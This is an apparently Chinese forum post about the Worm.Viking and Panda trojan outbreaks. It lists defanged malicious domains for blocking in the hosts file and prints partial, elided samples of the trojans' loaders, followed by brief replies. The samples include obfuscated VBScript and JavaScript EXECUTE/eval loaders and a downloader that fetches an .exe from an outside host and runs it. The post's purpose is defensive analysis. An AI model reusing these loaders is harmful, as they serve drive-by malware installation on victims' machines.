.Xil790
下面是最新的恶意病毒木马(威金、熊猫烧香)网址
请复制以下命令来屏蔽 开始 -> 运行 ->
%windir%\system32\notepad.exe %windir%\system32\drivers\etc\hosts
偶在 www,q 之间做了个,号 请自行改正否则无效。
↓该成“.”
0.0.0.0 www,qq380.com # Worm.Viking
0.0.0.0 www,wulin2.com.cn # 武林外传 发现木马
0.0.0.0 www,35569.com
0.0.0.0 www,chinanet123.cn # Worm.Nimaya
0.0.0.0 www,photo.ccoo.cn # 恶意弹出
0.0.0.0 www,windown.com.cn
0.0.0.0 windown.com.cn
0.0.0.0 awenbin.anytome.com # Worm.Nimaya
0.0.0.0 www,anytome.com # Worm.Nimaya
0.0.0.0 www,unibit.com.cn/default.asp # 最新 Worm.Nimaya
0.0.0.0 www,krvkr.com/worm.exe # 最新 Worm.Nimaya
关于最近“威金、熊猫烧香”病毒爆发事件。偶做了统一分析!
发现很多病毒木马都是通过:
ActiveX控件、VBScript 来实现后台下载安装运行
通过以下脚本了解到病毒木马是调用了wscript.exe命令和其他程序等,成功实现在下载
经过不断测试发现ActiveX控件设置最底,删除VBScript命令和其他需要调用的程序来禁止下载!测试效果不佳!IE跟本无法其禁止下载!
最后发现VBScript调用了X个DLL控件 只要删除其控件那么IE下载 都将失败!但部分网站 则打不开或出现未知错误等情况!偶特意写了个
脚本来实现禁止IE下载和恢复下载!
所谓的IE下载是指利用“ActiveX控件、VBScript 来实现后台下载安装运行”并不是普通下载方式!禁止IE下载 并不影响 IE正常使用和
下载、和浏览网站等!除部分需要掉用ActiveX控件、VBScript等。
可以使用该脚本来解除ActiveX控件、VBScript。和禁用 ActiveX控件、VBScript 等。注意 该脚本正在调试中!脚本根据不同人群自行设
置其功能是阻止带有病毒木马网站下载病毒木马程序!也可能给用户带来未知的疑难问题。解除即可恢复正常。调试完成后发布。请关注 (www.dngz.net)为您排除一切电脑故障
大家有什么建议等请留下宝贵的建议!最后是偶想说说关于IE调用“ActiveX控件、VBScript下载,比较熟悉编写网页的朋友和写 ActiveX
控件、VBScript 请留下 调用了那些 DLL 库!偶这只掌握了部分
注意,屏蔽DLL库 在不影响下载,浏览等情况下可以才可以屏蔽。
1、号脚本 .htm格式
<html><head></head><body>hello```</body></html>
<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,
中间部分省略...
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))
</Script>
2、号脚本 .VBS格式
<script language="VBScript">
on error resume next
中间部分省略...
set strm = dfile.createobject("Ad"&QQ67112525&"odb."&F4sdTRhh&"Str"&"eam","")
strm.type = 1
http.Open "GET", "http;//v180.net/qq/qq.exe", False
中间部分省略...
set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
</script>
3、号脚本 .VBS格式
function rechange(jijy)
s=Split(jijy,",")
qq976769=""
For i = 0 To UBound(s)
qq976769=qq976769 Chr(eval(s(i)))
Next
rechange=qq976769
End Function
qq976769="79,110,32,69,114,114,
中间部分省略...
0,97,116,101,46,98,97,116,34,41"
i=qq976769
execute(rechange(I))
4、号脚本 .js格式
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString
(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function() ,
{return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('15("\\l\\s\\7\\9\\2
\\e\\g\\7\\1
中间部分省略...
\\L")',62,68,'145|40
中间部分省略...
0|176|52|eval'.split('|'),0,{}))
时间紧张,暂写部分内容!有空在和大家聊
先附上批处理脚本图。欢迎大家提意见。
呵呵 我是新手 我知道了
又学到新鲜的东西。。。。
有意思。